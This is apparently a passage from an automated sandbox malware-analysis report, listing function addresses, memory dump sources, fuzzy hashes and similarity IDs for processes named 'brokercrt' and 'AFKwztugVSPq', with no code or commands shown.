                  • Opcode Fuzzy Hash: aeeab1d6cf2c7074bf6f083926c457a9d008c0507dc10e87b72f2826a66012d7
                  • Instruction Fuzzy Hash: 63511370D0D65E8EEB94EBA8D4986EDBBF1EF58340F50017AD049E72D2DB386984CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F120B5 Relevance: .1, Instructions: 141COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a0217f1c85081db6138a9b8693bbf6304612e7429a587d53b985c34cac40cea
                  • Instruction ID: d7f689c14e7430f8ec5d06e76864bc2c809724477ab4ea2f23475c2f8985e46e
                  • Opcode Fuzzy Hash: 8a0217f1c85081db6138a9b8693bbf6304612e7429a587d53b985c34cac40cea
                  • Instruction Fuzzy Hash: 2F412731A0DA8A4FE355EBB898951B9FBE0EF8A390F0541BBD40DD31D2DF28AC418355
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1353B Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8ed3deb320ff9077a3bbb031e5a767d9b8d65aac1a6f7f270bc2c34d0f3f082
                  • Instruction ID: 9200a57188413271b39b6c3d2cb4af1ac484e09b3ae2422c3be8a265bd9d70c7
                  • Opcode Fuzzy Hash: b8ed3deb320ff9077a3bbb031e5a767d9b8d65aac1a6f7f270bc2c34d0f3f082
                  • Instruction Fuzzy Hash: E5417971E1D94A9FEB85EB6CD8596B9BBE0FF59350F4400BAD04ED32D2DF2868018B14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1AF7D Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4be4e0e46f6622d005a4155b916c2042bf3e834e0eafa8dad8237e7049341ddb
                  • Instruction ID: d4aa1a6b9dbb3136f56b7289676d93f9b058cdde561e15ffb3694ee13848c308
                  • Opcode Fuzzy Hash: 4be4e0e46f6622d005a4155b916c2042bf3e834e0eafa8dad8237e7049341ddb
                  • Instruction Fuzzy Hash: 7F41A031D1D6868FE702AB7848191B97FA0FF16740F0805BBC459D71D3EB28A9498359
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1AC15 Relevance: .1, Instructions: 103COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ec56e9965381ff02d002b096469c66133189588fc54943b79733df7052fa4b7
                  • Instruction ID: d4ac8c0e8188853ab05f0864fbb78d33633ab4c952f094bed16a6c3b44887d9c
                  • Opcode Fuzzy Hash: 7ec56e9965381ff02d002b096469c66133189588fc54943b79733df7052fa4b7
                  • Instruction Fuzzy Hash: DE31E231A0D65A9FE712FBA8A8885E9B7E0EF45351F0545B3D40CCB0A3DF38A48483A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1A875 Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 534fb0448e5a974af19b96c6803466e15a3726bb8a4ccc55ad3c4adfdf077971
                  • Instruction ID: e07ff60d20b550a9fcb841900750e1294dd5f367b4e9739fc67d8c4944f741d1
                  • Opcode Fuzzy Hash: 534fb0448e5a974af19b96c6803466e15a3726bb8a4ccc55ad3c4adfdf077971
                  • Instruction Fuzzy Hash: B2216631E1D6498EEB49EBA4E8256FDBBB1FF58351F10017AD00AE32C2DF3828458B15
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F123DB Relevance: .1, Instructions: 74COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction ID: fa0bb08e9aa91f08223adb57bd6d589720542cfc21a8eac91768fd224a323ec0
                  • Opcode Fuzzy Hash: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction Fuzzy Hash: 48214731D0C52A8EEB14FB94D841BFDB3A0EF91390F001279D41EA31D1EF38AD548A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F13304 Relevance: .1, Instructions: 71COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b232192c02307b7f595c5ffab4fd18f0cef0db367016dde1f8e9fade28e4fd1
                  • Instruction ID: 3596779cabaaab10775e8e6da01d77fcca8972b63098fb89f0ac408124b2f987
                  • Opcode Fuzzy Hash: 4b232192c02307b7f595c5ffab4fd18f0cef0db367016dde1f8e9fade28e4fd1
                  • Instruction Fuzzy Hash: 8A21903084D78A9FE743EB7888585A97FF0FF1A350F0904FBD485CB0A2DA289945C725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F10A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62aaf18e1dbb4326439dd9b53dc1fb391b2245b38451efc7bbe140b82a1ca40a
                  • Instruction ID: a6c2ab4b15adf42d7990356f394614fa417093ff4e0abedc8cfb4224bbefeaa1
                  • Opcode Fuzzy Hash: 62aaf18e1dbb4326439dd9b53dc1fb391b2245b38451efc7bbe140b82a1ca40a
                  • Instruction Fuzzy Hash: CD116A31D0C55E9EE780FB68D8492B97BE0FF98380F4405B6D809C6192EF38A9448740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1372F Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765eb34e8f347c69b29e6047a71357a126399705434d46f64a9ad1da230dc60f
                  • Instruction ID: 1535ac52a20decb38073eb6994a405726c7f632ce073feb40d94fd32b9eaadcc
                  • Opcode Fuzzy Hash: 765eb34e8f347c69b29e6047a71357a126399705434d46f64a9ad1da230dc60f
                  • Instruction Fuzzy Hash: 56118B31A0D9098FEB48DF68E8283AA7AE1EB85325F50007ED10AD36D6CFF914158B40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F13491 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3cf85a2dfcd76bef3fe78a1cd55e892e94e39a5489ac3beb7dffd1a5bca685e5
                  • Instruction ID: bb36f012e39554129503c0ec4ae2968079b5c9fcf1567be8f77566576f04112a
                  • Opcode Fuzzy Hash: 3cf85a2dfcd76bef3fe78a1cd55e892e94e39a5489ac3beb7dffd1a5bca685e5
                  • Instruction Fuzzy Hash: 34118E3090C68E8FEB4AEF68C4992B97BA0FF18341F4404BAD41AC71D1EF39A950C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1AEF8 Relevance: .1, Instructions: 51COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e528d7f5b69a1683d1d711a45abfc70e44ee4a49df1fe73b52fe1dde58cf6d7c
                  • Instruction ID: 91f6464a1152d496a06f14ee3460e0e3ce09ac42251ea3fee202c829eb36db6c
                  • Opcode Fuzzy Hash: e528d7f5b69a1683d1d711a45abfc70e44ee4a49df1fe73b52fe1dde58cf6d7c
                  • Instruction Fuzzy Hash: 29112930908A0E9FEB88EF68D4496BE7BE1FF68345F50057AD41ED2190DB36B154CB84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6cd85987c77b839754b2e64512af08a2bbc5c07a46a4dd17754586374a69eac5
                  • Instruction ID: a1393a00beb8d6748ea798ad5d61d7f87dbb95d679f3637259794d5afc230f11
                  • Opcode Fuzzy Hash: 6cd85987c77b839754b2e64512af08a2bbc5c07a46a4dd17754586374a69eac5
                  • Instruction Fuzzy Hash: 5F014C3090950E8EEB88EF24C0596FA77A1FF69345F50547ED40EC21D2DB76A990CB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12E79 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ddb3a91a79d8bb82481e5ab6c10c8c2347b3558c7f0ce4a45a42a8d928361395
                  • Instruction ID: 75e088f3fa1aca642f4da6e37519bbb30d85f0625255371822ac707576684d13
                  • Opcode Fuzzy Hash: ddb3a91a79d8bb82481e5ab6c10c8c2347b3558c7f0ce4a45a42a8d928361395
                  • Instruction Fuzzy Hash: 5601DB3080D68A8FE742FBB888481A97BE0EF5A350F4909B2D00DC70E2EB38A8448710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1ABA9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: caabb384be494095e7f38d594e0c839d623e7a36e3e5232ca3a014bb7bb1e538
                  • Instruction ID: 1e84f7606b50fef63d0b5d92ba1fae3e922b228a29ebea72eb38a25ac9896b3f
                  • Opcode Fuzzy Hash: caabb384be494095e7f38d594e0c839d623e7a36e3e5232ca3a014bb7bb1e538
                  • Instruction Fuzzy Hash: 2401847090D6894FE752FB7488595A97BE1FF1A341F0646F2D008C70A2EB38E8848715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F127DD Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c656947337b6169fb301ac1b27184e1ba605c019523fb82c7a64ab4d860debb3
                  • Instruction ID: f1e1f91eb1fab1d21efef0d396d871e20597c45cb1f5c8ed16be3d2980a2ec61
                  • Opcode Fuzzy Hash: c656947337b6169fb301ac1b27184e1ba605c019523fb82c7a64ab4d860debb3
                  • Instruction Fuzzy Hash: DF01B83080D64A8FE741FBA888882A9BBE0EF19340F4544B6D408C70E2EB38E844C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9dcbb2297e77fdbaf4cf120dd5edfb2b8221e4dbbef91615516d1102c0ad2f11
                  • Instruction ID: 5581346c9ca102ad97e7ee05a12f11cb538ba8c19e61c6aae448177cfaecf986
                  • Opcode Fuzzy Hash: 9dcbb2297e77fdbaf4cf120dd5edfb2b8221e4dbbef91615516d1102c0ad2f11
                  • Instruction Fuzzy Hash: 91018C3091860E9EEB49FFA4C4992BAB7A1FF18345F50087EE40EC25D1EF35A950CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c5c4eb6ffcff22b97ff552c99059b1bde3ba0979a4164224e5c894abe06ceede
                  • Instruction ID: 4495ae0c2d287c1d4ff39efa1a274c8c6e0853ebc0fb27ff87d65bff9d9b8d6a
                  • Opcode Fuzzy Hash: c5c4eb6ffcff22b97ff552c99059b1bde3ba0979a4164224e5c894abe06ceede
                  • Instruction Fuzzy Hash: AB016930818A0E9EEB49FBA484582BAB7A1FF18345F10087EE41EC25D1DF35A950C614
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F105D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8fbba230b973e6103ebfdd7edeeeae001a2010ee0377994e0b9648df7f5df2d
                  • Instruction ID: a64a212be57dc9997c4d70ad92931a4731a102bc151064165388022637c521c7
                  • Opcode Fuzzy Hash: d8fbba230b973e6103ebfdd7edeeeae001a2010ee0377994e0b9648df7f5df2d
                  • Instruction Fuzzy Hash: A8F0CD3091E64E8FEB84EF2494052FA77A4EF15348F40107AE80DC21D2DB39A8A0CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F11C1D Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 045ba67c0352df3fafe3d2c02cfc419244a05380c139964b7fa45db46444bcea
                  • Instruction ID: 4df9d8b3873020c5ebe73c78c7de18608c5d1c4b97425f3b5cd3b67528c7661a
                  • Opcode Fuzzy Hash: 045ba67c0352df3fafe3d2c02cfc419244a05380c139964b7fa45db46444bcea
                  • Instruction Fuzzy Hash: B701817090E68E8FEB95EF2484552FA7BA1EF55340F4410BED808C61D2DB759894CB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1B2C8 Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a24cf11333218adb9bb4dfc8239480e57d59b3e49e7ceaf1571356ff597c7bf1
                  • Instruction ID: 5435a44ad477d50fffddd7f230f4b09972ae7f36770cdede2b863c24ffaa57dd
                  • Opcode Fuzzy Hash: a24cf11333218adb9bb4dfc8239480e57d59b3e49e7ceaf1571356ff597c7bf1
                  • Instruction Fuzzy Hash: A8F06970E1D5298EEB91EB28C445BEA73B1FF58300F5002A6D40CE3186CF349D818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1276D Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0f1dcd8478505e799a751429414d376918a8813a3887690b26636a8a57799876
                  • Instruction ID: 6893df7d55425e00524ec462bc857ded1282e1900ba146e121e3e67b40ec2f21
                  • Opcode Fuzzy Hash: 0f1dcd8478505e799a751429414d376918a8813a3887690b26636a8a57799876
                  • Instruction Fuzzy Hash: D3F0903080D78E8FEB59EFA488191BA3BA0FF16351F4404BAE809C65D2EB389854C701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F126F9 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35aaa08fbf76cb931d6507bb7ee91567e2bf67a3ac5290fc9be55b75c5a6fbc9
                  • Instruction ID: cfaabb0a7a946aad1feed06a3c3cd6ac4c7f8cc27f2b54c46f6884a472406ae8
                  • Opcode Fuzzy Hash: 35aaa08fbf76cb931d6507bb7ee91567e2bf67a3ac5290fc9be55b75c5a6fbc9
                  • Instruction Fuzzy Hash: 71F0963080E7C94FE75AEF6488691BA7FA1FF16305F4509BBD409C64D2EB399958C701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F10F80 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1862a82a4b6d5e2efce50a11d792df212fcb91c585a8440fee964014b03fc315
                  • Instruction ID: 93a7ab9dc5abbd1947a44d247bdd831722d45a88293eef838c90e850ee396fa8
                  • Opcode Fuzzy Hash: 1862a82a4b6d5e2efce50a11d792df212fcb91c585a8440fee964014b03fc315
                  • Instruction Fuzzy Hash: 69F0173091D5198FEB10FB14C844BEEB6B1EB94391F105275D409A3295DF386A84CF88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F17C25 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: afb1bd4b97c970feaccee6df8c0da2c0b8a83772c0ade77cedb15b0cf63110da
                  • Instruction ID: 6a99188a7cc3da2ed0413a12c591b1dd2d36b0fc7eb99451fca51b10ff6181cb
                  • Opcode Fuzzy Hash: afb1bd4b97c970feaccee6df8c0da2c0b8a83772c0ade77cedb15b0cf63110da
                  • Instruction Fuzzy Hash: 8DF0627095C92E8EDFA8EB088894BBDB2A1EB58352F5054A9D01DE32C4DB746E809F44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F178FF Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 306b64a898807393ad75d0bb71f1e5bea56585cdc12b7145899059b8caaf4ed5
                  • Instruction ID: ab69e98dd4363f131305f4545acf3f57d36cc0ab4aa3e17f2357a4434c54a741
                  • Opcode Fuzzy Hash: 306b64a898807393ad75d0bb71f1e5bea56585cdc12b7145899059b8caaf4ed5
                  • Instruction Fuzzy Hash: FAE04E70958D2E8EDFA8EB088894BADB7B1FB58302F5114A9D01DE3284DB746E808F04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Function 00007FF848F45430 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8mH
                  • API String ID: 0-1362847371
                  • Opcode ID: b6633c96dfea0136c6137b88065286edfb0f46e8f30c14178f6a018ff4811379
                  • Instruction ID: 44b204cac0f55bd1298d4686f966694763994874293ce3f3ad0a61b3e6784950
                  • Opcode Fuzzy Hash: b6633c96dfea0136c6137b88065286edfb0f46e8f30c14178f6a018ff4811379
                  • Instruction Fuzzy Hash: EC51E670D1891D8FEF94EBA8D899BBDB7F1FB68741F50016AD00DE7295DB34A8818B40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3121D Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 94113ead1634459c37fbd6e8ae374275ebda7517e08a12f2f9bdbf9292de5163
                  • Instruction ID: d021818bd0757f362ff6f849916c6de37102ff803726042f7a1a298886ca1de6
                  • Opcode Fuzzy Hash: 94113ead1634459c37fbd6e8ae374275ebda7517e08a12f2f9bdbf9292de5163
                  • Instruction Fuzzy Hash: 5D119D30D0D64E8EEB89EB6884A92B97BA0FF59341F0401BFE40AD60D2EF249484C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F31230 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 5b25f7afe5e0ea1d7925297e705796305269e0eea0d3497581bee106077a7782
                  • Instruction ID: 022346c66db61511c5f9a4ec2745567a25df772c993a12adb56729f502fc625d
                  • Opcode Fuzzy Hash: 5b25f7afe5e0ea1d7925297e705796305269e0eea0d3497581bee106077a7782
                  • Instruction Fuzzy Hash: E1F08C30D1D65F8EEF98ABA888582FA77A4FF56340F00017BE819D20D1EF2495948254
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F305ED Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: >M_^
                  • API String ID: 0-4160910197
                  • Opcode ID: 580648c2356bb66e6346bf05b75b6de318945e381f43ff8aee6331c46f268f24
                  • Instruction ID: e11d46846e51bfa440e28313e1abba310ab3fa6dee2630fe1eb4133ce048f313
                  • Opcode Fuzzy Hash: 580648c2356bb66e6346bf05b75b6de318945e381f43ff8aee6331c46f268f24
                  • Instruction Fuzzy Hash: D6F02B3084D64E9FEB15AF6088952FA7790FF09346F14093BE82DC11C1EB387514C781
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F316B8 Relevance: .3, Instructions: 287COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb1724c289132c3c536faf1f38da43ff5b0b71c355295c7e4accfa61bcc429c4
                  • Instruction ID: db73c1ef88886e1bce219289cd4413b1d97bec58b081ee5d1d673e37175216fa
                  • Opcode Fuzzy Hash: bb1724c289132c3c536faf1f38da43ff5b0b71c355295c7e4accfa61bcc429c4
                  • Instruction Fuzzy Hash: 9481BE31A0CA9A8FDB58EF2888515B977E2FF99744F14457AE44DC32C2CE34AC82C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F31C9D Relevance: .2, Instructions: 193COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c63f149f6b3135c73153794dd362103ef62af06953a72d9dd7ea89a2d7012c8f
                  • Instruction ID: 68ebc5609cb73cd1c503d902795f1b817751b7bb1096589a08c71526ea397689
                  • Opcode Fuzzy Hash: c63f149f6b3135c73153794dd362103ef62af06953a72d9dd7ea89a2d7012c8f
